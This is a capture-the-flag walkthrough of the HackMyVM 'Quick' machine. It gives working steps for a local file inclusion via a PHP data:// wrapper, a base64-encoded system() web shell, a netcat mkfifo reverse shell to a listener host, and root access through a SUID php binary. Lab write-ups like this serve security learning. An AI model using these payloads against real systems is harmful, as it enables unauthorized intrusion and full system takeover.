HackMyVM - Quick
Enumeration
Ports
The target has only one port open, 80 (HTTP). I discovered an LFI in this endpoint:

```
http://192.168.56.101/index.php?page=
```
Since I know it's PHP, I'll grab the PHP wrapper payloads from the File Inclusion/Path traversal page on HackTricks. I'll read `/etc/passwd` with this payload. Note that the `data://` wrapper makes `include` execute the supplied PHP source, so it only works when `allow_url_include` is enabled, and when it does work it already gives code execution, not just file reads:

```
data://text/plain,<?php echo base64_encode(file_get_contents("/etc/passwd")); ?>
```
Foothold
I see there is a user `andrew` on the target, and I can read their home directory, which contains the user flag. I'll use one of the payloads to get RCE and retrieve the user flag.

Payload:

```
data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```

Request (the whole URL is single-quoted so the shell does not split it on `&` or strip the quotes):

```
curl --path-as-is 'http://192.168.56.101/index.php?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=cat+/home/andrew/user.txt'
```

The base64 decodes to:

```php
<?php system($_GET['cmd']);echo 'Shell done !'; ?>
```
Result:

```
<main>
_________
_.--""'-----, `"--.._
.-'' _/_ ; .'"----,`-,
.' :___: ; : ;;`.`.
. _.- _.- .' : :: `..
__;..----------------' :: ___ :: ;;
.--"". ' ___.....`:=(___)-' :--'`.
.' .' .--''__ : ==: ;
.--/ / .'.'' ``-, : : '`-.
."', : / .'-`\\ .--.\ : : , _\
; ; | ; /:' ;; /__ \\: : : /_\\
|\_/ | | / \__// /"--\\ \: : : ;|`\|
: " /\__/\____// """ / \\ : : : :|'||
["""""""""--------........._ / || ; __.:--' :|//|
"------....______ ].'| // |--"""'__...-'`\ \//
`|HMV{flag-flag}|.--'": : \ // |---""" \__\_/
"""""""""' \ \ \_.// /
`---' \ \_ _'
`--`---'
```
Privilege Escalation
I got a reverse shell as `www-data` with a listener on 192.168.56.1:3371, using this payload. The `cmd` value URL-decodes to `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.56.1 3371 >/tmp/f`:

```
curl --path-as-is 'http://192.168.56.101/index.php?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.56.1%203371%20%3E%2Ftmp%2Ff'
```
Stabilize the shell.
Looking at the SUID binaries, I see an unusual one, `/usr/bin/php7.0`. According to the php entry on GTFOBins, I can spawn a shell as root. The `-p` flag tells `sh` to keep the effective UID instead of dropping it, and `pcntl_exec` requires the `pcntl` extension to be loaded:

```
/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"
```
I have a shell as root, so I'll retrieve the root flag:

```
# cat /root/root.txt
___.............___
,dMMMMMMMMMMMMMMMMMMMMMb.
dMMMMMMMMMMMMMMMMMMMMMMMMMb
| | -_ - | |
| |_______|___ |
| ___......./'.__`\ |
|_.-~" `"~-.|
7\ _...._ |`.
/ l .-' `-. j \
: .qp. / __________ \ .qp. :
| d8888b | | d8888b |
.---: `Y88P|_|__________|_|Y88P'\/`"-.
/ : /,------------------------.: \
: |`. | | [_FLAG_] || ,'| :
`\.____| `. : `.________.'| ,' |____.'
MMMMM| | |`-.________.-| / |MMMMM
.-------------`------------'-'-----|-----.
(___HMV{root-flag}__)
MMMMMM MMMMMM
`MMMM' `MMMM'
```
This post is licensed under CC BY 4.0 by the author.